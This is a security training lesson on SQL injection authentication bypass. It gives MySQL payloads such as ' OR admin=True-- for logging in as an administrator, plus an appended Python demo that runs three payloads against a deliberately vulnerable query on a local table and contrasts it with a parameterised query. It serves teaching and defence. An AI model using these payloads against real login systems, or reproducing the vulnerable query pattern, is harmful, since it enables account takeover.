Hakatemia
02 Injection Techniques

(MySQL) Changing WHERE clauses to bypass authentication (specific user)

Difficulty: Easy, 10 min

In the last module, we learned how a programming error can lead to an attacker being able to modify the structure of the SQL queries made by the application.

We did an exercise where we bypassed the login by forcing the database to return all user rows regardless of the password, allowing the application to log us in as the first user, who happened to be the system administrator.

But what if we want to log in as a different user? Then forcing every row back is not enough: we need to add a condition to the WHERE clause that instructs the database to return only the user we want, so that the "first row" the application logs in is the one we chose.

If we knew the administrator's email address, we could approach the problem, for example, by appending ' OR email='[email protected]'-- to the password field (note the trailing space: MySQL only treats -- as a comment when it is followed by whitespace), resulting in the SQL:

SQL
SELECT * FROM user WHERE email='[email protected]' AND password='foo' OR email='[email protected]'-- '

However, we do not know the administrator's email address. What we do know is that the user table has a column named admin of boolean type, so its value is either True or False (in MySQL, BOOLEAN is just TINYINT(1), and TRUE is the integer 1).

We should therefore be able to log in as an administrator as long as the query only returns rows where admin is True. Because AND binds more tightly than OR, the injected OR admin=True is evaluated against the whole email/password check, so the credentials we submit no longer matter and the database returns every administrator row; the application then logs us in as the first of them. Try the practice below and get the application to execute a query like this:

SQL
SELECT * FROM user WHERE email='[email protected]' AND password='foo' OR admin=True-- '
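As an added example, not part of the Hakatemia material or its lab environment, the following Python script reproduces the vulnerable login described above against an in-memory SQLite table (a stand-in for MySQL; the table, its three users and the submitted address nobody@example.com are constructed assumptions) and runs all three payloads discussed on this page: the blanket bypass from the previous module, the known-email variant, and the admin=True variant. It also runs the same query with bound parameters to show why the payloads then stop working.

```python
import sqlite3

# Constructed sample table (an assumption, not the course's lab data): three
# users, with the administrator deliberately NOT in the first row, so that a
# blanket "OR 1=1" bypass lands on an ordinary user instead of the admin.
SAMPLE_USERS = [
    ("alice@example.com", "alice-pw", 0),
    ("bob@example.com", "bob-pw", 0),
    ("root@example.com", "s3cret", 1),
]

# Three payloads, each appended to whatever is typed into the password field.
# The trailing space after "--" matters on MySQL, which only treats "--" as a
# comment when whitespace follows it (SQLite, used here, is more lenient).
PAYLOAD_ANY_USER = "foo' OR 1=1-- "
PAYLOAD_KNOWN_EMAIL = "foo' OR email='root@example.com'-- "
PAYLOAD_ANY_ADMIN = "foo' OR admin=True-- "


def build_db():
    """In-memory SQLite stand-in for the MySQL 'user' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (email TEXT, password TEXT, admin BOOLEAN)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def build_query(email, password):
    """The programming error from the previous module: user input is pasted
    straight into the SQL text, so a quote in the input changes its structure."""
    return (f"SELECT email, admin FROM user WHERE email='{email}' "
            f"AND password='{password}'")


def vulnerable_login(conn, email, password):
    """Returns the first matching user as {'email': ..., 'admin': ...}, or None.
    AND binds more tightly than OR, so an injected 'OR <cond>' is OR-ed with
    the whole email/password check and <cond> alone decides which rows match."""
    row = conn.execute(build_query(email, password)).fetchone()
    return None if row is None else {"email": row[0], "admin": bool(row[1])}


def safe_login(conn, email, password):
    """Same query with bound parameters: the driver sends the values separately
    from the SQL text, so a quote in the password is just another character."""
    row = conn.execute(
        "SELECT email, admin FROM user WHERE email=? AND password=?",
        (email, password),
    ).fetchone()
    return None if row is None else {"email": row[0], "admin": bool(row[1])}


def run_payloads():
    """Runs each payload against the vulnerable login, and the admin payload
    against the parameterised one, returning the rows each login picked."""
    conn = build_db()
    submitted_email = "nobody@example.com"  # assumption; the OR clause wins anyway
    return {
        "any_user": vulnerable_login(conn, submitted_email, PAYLOAD_ANY_USER),
        "known_email": vulnerable_login(conn, submitted_email, PAYLOAD_KNOWN_EMAIL),
        "any_admin": vulnerable_login(conn, submitted_email, PAYLOAD_ANY_ADMIN),
        "safe": safe_login(conn, submitted_email, PAYLOAD_ANY_ADMIN),
    }


if __name__ == "__main__":
    for name, result in run_payloads().items():
        print(f"{name:12} -> {result}")
```

With the administrator sitting in the third row, the OR 1=1 payload logs in alice (not an admin), both targeted payloads return root with admin set, and the parameterised login returns no row at all because the payload is compared literally against the stored password. The keyword TRUE is accepted by SQLite 3.23 and later; on MySQL it is simply the integer 1, so admin=1 works identically there.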